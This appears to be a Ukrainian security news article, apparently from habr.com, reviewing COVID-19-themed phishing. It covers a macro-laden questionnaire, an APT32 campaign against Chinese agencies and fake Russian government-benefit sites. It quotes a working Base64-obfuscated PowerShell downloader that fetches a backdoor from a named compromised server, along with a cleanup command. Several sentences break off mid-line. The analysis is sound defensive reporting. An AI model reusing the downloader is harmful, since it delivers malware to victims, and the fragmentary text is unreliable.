Зловмисники продовжують експлуатувати тему COVID-19, створюючи все нові й нові загрози для користувачів, які цікавляться всім, що стосується епідемії. У
Пам'ятайте
Безкоштовний тест на COVID-19 не бажаєте?
Інший показовий приклад фішингу на тему коронавірусу був
Переконати більшість користувачів у необхідності увімкнути макроси теж було нескладно. Для цього застосовувався стандартний трюк, коли для заповнення анкети потрібно спочатку дозволити макроси, а значить запустити скрипт VBA.
Як ви можете побачити, скрипт VBA спеціально маскується від антивірусів.
У Windows є функція очікування, коли програма чекає /T <секунд>, перш ніж прийняти відповідь “Так” за промовчанням. У нашому випадку скрипт чекав 65 секунд, перш ніж видалити тимчасові файли:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А в процесі очікування відбувалося завантаження шкідливого програмного забезпечення. Для цього було запущено спеціальний скрипт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Після декодування значення Base64 скрипт PowerShell завантажує бекдор, що знаходиться на попередньо зламаному веб-сервері з Німеччини:
http://automatischer-staubsauger.com/feature/777777.png
і зберігає його під ім'ям:
C:UsersPublictmpdirfile1.exe
Папка ‘C:UsersPublictmpdir’
видаляється при запуску файлу 'tmps1.bat', який містить команду cmd /c mkdir ""C:UsersPublictmpdir"".
Цільова атака на державні структури
Крім цього, нещодавно аналітики FireEye повідомили про цільову атаку APT32, спрямовану на урядові структури Уханя, а також Міністерство Невідкладної Допомоги Китаю (Chinese Ministry of Emergency Management). В одному з RTF, що розпізнавала, містилося посилання на статтю з New York Times під назвою
Цікаво, що на момент виявлення жоден з антивірусів не детектував цей екземпляр згідно з даними Virustotal.
Коли офіційні сайти “лежать”
Найяскравіший приклад фішингової атаки стався у Росії буквально днями. Приводом для цього стало призначення довгоочікуваної допомоги на дітей віком від 3 до 16 років. Коли було оголошено про старт прийому заяв 12 травня 2020 року, мільйони рвонули на сайт Держпослуги за довгоочікуваною допомогою і обрушили портал не гірше за професійну DDoS-атаку. Коли президент сказав, що "Держпослуги не впоралися з потоком заявок", у мережі заговорили про те, що запрацював альтернативний сайт прийому заяв.
Проблема полягає в тому, що сайтів запрацювало відразу кілька, і поки що один, справжній за адресою posobie16.gosuslugi.ru дійсно приймає заяви, ще
Колеги із «СерчІнформ» знайшли близько 30 нових шахрайських доменів у зоні .ru. Infosecurity a Softline Company відстежили понад 70 подібних фейкових сайтів держпослуг із початку квітня. Їхні творці маніпулюють звичною символікою, а також використовують комбінації зі слів gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie і так далі.
Ажіотаж та соціальна інженерія
Усі ці приклади лише підтверджують, що зловмисники успішно монетизують тематику коронавірусу. І чим вища соціальна напруга і чим більше неясних питань, тим більше шансів у шахраїв вкрасти важливі дані, змусити людей самостійно віддати свої гроші або просто зламати більше комп'ютерів.
А з огляду на те, що пандемія змусила потенційно не готових до цього людей масово працювати з дому, в зоні ризику виявляються не лише особисті, а й корпоративні дані. Наприклад, нещодавно користувачі Microsoft 365 (колишнього Office 365) також зазнали фішингової атаки. Людям масово надходили голосові “пропущені” повідомлення у вкладеннях до листів. Однак фактично файли були HTML-сторінкою, яка відправляла жертв атаки на
Джерело: habr.com